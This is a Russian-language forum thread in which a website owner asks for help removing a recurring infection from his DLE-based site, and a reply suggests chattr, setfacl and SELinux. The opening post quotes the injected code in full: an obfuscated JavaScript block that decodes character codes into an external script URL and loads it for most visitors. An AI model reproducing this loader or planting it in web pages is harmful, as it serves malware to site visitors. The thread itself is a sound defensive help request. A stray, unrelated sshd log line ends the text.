Вирус на сайте! Помогите!!!

Есть и такой ОС.

Модератор: weec

Правила форума
Убедительная просьба юзать теги [cоde] при оформлении листингов.
Сообщения не оформленные должным образом имеют все шансы быть незамеченными.
pismenov
рядовой
Сообщения: 47
Зарегистрирован: 2008-09-28 8:58:05

Вирус на сайте! Помогите!!!

Непрочитанное сообщение pismenov » 2010-09-06 11:00:07

Приветствую! Ребята, ситуация следующая.
Где-то месяц назад пользователи начали жаловаться, что у них антивирус ругается при заходе на сайт. Выяснил, что этот вирус постоянно прописывает в разные файлы скрытые фреймы.
Пример.

Код: Выделить всё

if($member_id['user_group'] != "1"){
echo <<<HTML
<script type="text/javascript" language="javascript">
<!-- 

function zDhTB(geQzA){document.write(String.fromCharCode(parseInt(geQzA)-2));}  
var RuZRs="106B118B118B114B60B49B49B105B113B109B110B107B109B117B48B116B119B49B+105B103B118B48B108B117B+65B119B117B103B116B97B107B102B63B59B50B53B+40B111B113B102B103B63B101B110B107B101B109B"; var rxaZZ=RuZRs.split("B");
document.write("<s"+"cript type='text/javascript' language='javascri"+"pt' src='");
var YbZEu=0;while(YbZEu<rxaZZ.length-1){zDhTB(rxaZZ[YbZEu]);YbZEu++;}
document.write("'></sc"+"ript>");

// -->
</script>

HTML;
}
Сначала я пытался чистить это дело ручками... Потом поставил clamav,rhunter проверил на вирусы - ничего. Погасил ftp сервис - вирус всё равно прописывается. Потом поставил на все файлы сайта след. мод 755, причём владельцем сделал root:wheel - вирус всё равно прописывается. Причём владельцем файла, в котором прописался вирус становится пользователь из под которого запущен php. PHP работает в режиме CGI. Уже не знаю как с ним бороться... :cry: Да, чуть не забыл,

Код: Выделить всё

uname -a
Linux ####.vps.agava.net 2.6.18-194.8.1.el5.028stab070.2 #1 SMP 
Движок сайта DLE

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги хостинговой компании Host-Food.ru

Хостинг HostFood.ru

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

Andy
ст. лейтенант
Сообщения: 1117
Зарегистрирован: 2007-03-04 7:48:58
Откуда: Mytischi

Re: Вирус на сайте! Помогите!!!

Непрочитанное сообщение Andy » 2010-09-06 11:27:30

А полностью скрипт можешь привести, который вызвается?
Косяк агавы скорее всего, так как похожая ситуация именно у них уже была.
для защиты от записи:

Код: Выделить всё

man chattr
man setfacl
попробуй SELinux включить, если он есть, конечно.
Jul 16 19:37:15 freebsd sshd[4152]: Invalid user idiot from 210.75.200.104